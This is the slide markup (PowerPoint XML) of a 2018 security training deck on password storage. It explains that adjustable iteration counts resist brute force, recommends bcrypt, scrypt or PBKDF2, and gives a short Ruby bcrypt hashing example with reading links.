            <a:off x="19535613" y="3027594"/>
            <a:ext cx="2343722" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Resistance is futile.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="We will adapt."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4783464" y="6372188"/>
            <a:ext cx="1732162" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We will adapt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="996" name="All your password are belong to us."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13356319" y="10532352"/>
            <a:ext cx="4122962" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>All your password are belong to us.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994"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="994"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="994"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="9" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="996"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="996"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="996"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="995"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="995"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99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94" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="996" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="995" grpId="3"/>
    </p:bldLst>
  </p:timing>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00" name="graph-going-up.png" descr="graph-going-up.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24384000" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001" name="Over time, the iteration count can be increased to make it slower, so it remains resistant to brute-force attacks even with increasing computation power."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="379475">
              <a:defRPr sz="7718"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Over time, the iteration count can be increased to make it slower, so it remains resistant to brute-force attacks even with increasing computation power.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1002"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100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004" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</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10"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01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012" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1014" name="https://www.tarsnap.com/scrypt/scrypt.pdf"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.tarsnap.com/scrypt/scrypt.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1015" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1016" name="estimates.png" descr="estimates.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001018" y="2134774"/>
            <a:ext cx="22381964" cy="9446452"/>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0"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02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022" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Use Bcrypt!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use Bcrypt!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="or scrypt, or PBKDF2."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891166" y="7663129"/>
            <a:ext cx="4601668" cy="688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600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>or scrypt, or PBKDF2.</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0" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-128720" y="2580208"/>
            <a:ext cx="24641439" cy="8555584"/>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1031" name="require 'bcrypt'…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753751" y="2849562"/>
            <a:ext cx="16041937" cy="801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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>require</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'bcrypt'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:hueOff val="-2473792"/>
                  <a:satOff val="-50209"/>
                  <a:lumOff val="23543"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:hueOff val="-2473792"/>
                  <a:satOff val="-50209"/>
                  <a:lumOff val="23543"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>h =</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>BCrypt::Password.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'pass'</a:t>
            </a:r>
            <a:r>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:cost</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:hueOff val="-2473792"/>
                  <a:satOff val="-50209"/>
                  <a:lumOff val="23543"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>=&gt; "$2a$13$F5wn7iDFersQSSatHvRp/ehIBKuRfA7..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>h == </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'nope'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>=&gt; false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>h == </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'pass'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>=&gt; true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032"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03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034" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036" name="RUBY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="3068926"/>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RUBY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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0" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="https://en.wikipedia.org/wiki/Bcrypt…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Bcrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Scrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
